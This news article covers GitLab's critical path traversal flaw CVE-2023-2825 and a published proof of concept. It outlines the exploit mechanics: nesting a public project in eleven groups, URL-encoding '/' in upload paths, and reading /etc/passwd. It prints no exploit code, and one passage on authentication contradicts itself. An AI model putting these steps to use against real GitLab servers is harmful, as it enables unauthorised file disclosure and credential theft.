PoC Exploit Released for GitLab CVE-2023-2825 Vulnerability

by do son · Published May 25, 2023 · Updated May 25, 2023

GitLab, the ubiquitous platform enabling seamless collaboration for millions of developers worldwide, has recently released an emergency security update, version 16.0.1. This update tackles a critical path traversal flaw, labeled CVE-2023-2825, which hit the maximum score on the CVSS v3.1 severity scale (10.0). This discovery stands testament to the eternal vigilance required in the ever-evolving landscape of cybersecurity.

The vulnerability was unearthed by a keen-eyed security researcher known as ‘pwnie,’ who reported the flaw via GitLab’s HackOne bug bounty program. This security weakness plagues GitLab’s Community Edition (CE) and Enterprise Edition (EE) version 16.0.0. However, versions preceding this appear immune to the flaw.

Understanding the Threat

CVE-2023-2825 roots from a path traversal problem, granting an unauthenticated attacker the ability to peruse arbitrary files on the server when an attachment resides in a public project nested within at least five groups. This unusual prerequisite lends itself to the speculation that the issue lies in how GitLab handles or resolves paths for attached files across multiple group levels.

This exploitation poses a substantial threat, potentially exposing sensitive data like proprietary software code, user credentials, tokens, files, and private information. However, due to the freshness of its discovery and the severity of the problem, the vendor refrained from releasing too many details at this time.

Decoding the Exploitation

Vitellozzo, a security expert from the cybersecurity firm Occamsec, has released a Proof of Concept (PoC) detailing how the CVE-2023-2825 flaw can be exploited. The exploit operates on a peculiar requirement – the project needs to be nested within at least five groups. In fact, testing revealed a direct correlation between the number of groups and the directories that could be traversed – typically an ‘N + 1’ relationship.

File attachments in a standard GitLab install are stored under the /var/opt/gitlab/gitlab-rails/uploads/@hashed/… path. To reach the filesystem root, one must traverse back 10 directories – implying the need for 11 groups.

The Exploitation in Action

When an attachment is uploaded to a GitLab issue, a POST request is dispatched to /:repo/upload. GitLab then returns a JSON response with the file URL. However, GitLab fails to sanitize this file path, leading to the path traversal vulnerability. The file URL is made up of /:repo/uploads/:id/:file, where :file denotes the actual file name.

To exploit this flaw, the attacker has to URL encode the ‘/’ in the file path. GitLab then interprets this as a value and decodes it internally. In tests, encoding just the ‘/’ was enough to bypass Nginx path errors.

Only unauthenticated users can exploit this vulnerability on public repositories with the necessary nested group requirements. To access the repository, authentication is required.

The researcher creates the proof of concept written in Python. It creates the 11 groups, creates a public repo, uploads a file, and then exploits the vulnerability to get the file /etc/passwd. The PoC for exploiting the CVE-2023-2825 vulnerability is available here.

The Aftermath

Given the severity of the flaw and its potential for exploitation, it’s crucial that users promptly update to the latest version of GitLab.